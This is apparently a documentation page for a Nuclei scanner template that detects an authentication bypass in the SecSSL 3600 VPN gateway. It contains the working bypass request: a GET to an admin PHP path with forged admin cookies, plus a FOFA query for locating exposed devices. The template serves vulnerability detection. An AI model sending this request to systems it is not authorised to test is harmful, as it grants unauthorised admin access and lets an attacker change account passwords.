Secure Access Gateway SecSSLVPN - Authentication Bypass
ID: secsslvpn-auth-bypass
Severity: high
Author: SleepingBag945
Tags: secsslvpn,auth-bypass
Description
Section titled “Description”The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.
YAML Source
Section titled “YAML Source”id: secsslvpn-auth-bypass
info: name: Secure Access Gateway SecSSLVPN - Authentication Bypass author: SleepingBag945 severity: high description: | The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability. reference: - https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecSSL%203600%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E7%B3%BB%E7%BB%9F%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: app="安全接入网关SecSSLVPN" tags: secsslvpn,auth-bypass
http: - method: GET path: - "{{BaseURL}}/admin/group/x_group.php?id=1"
headers: Cookie: admin_id=1; gw_admin_ticket=1;
matchers-condition: and matchers: - type: word part: body words: - "group_action.php" - "anonymous" condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4a0a00473045022100ac2781b117905951383283998e1ca680036f2b401b730404753fb1e89ec38b9d022079b526fce46c33bdbc101f79b1555f707eddae0c9d95c2a4a7b6f6754718d4cf:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/qax/secsslvpn-auth-bypass.yaml"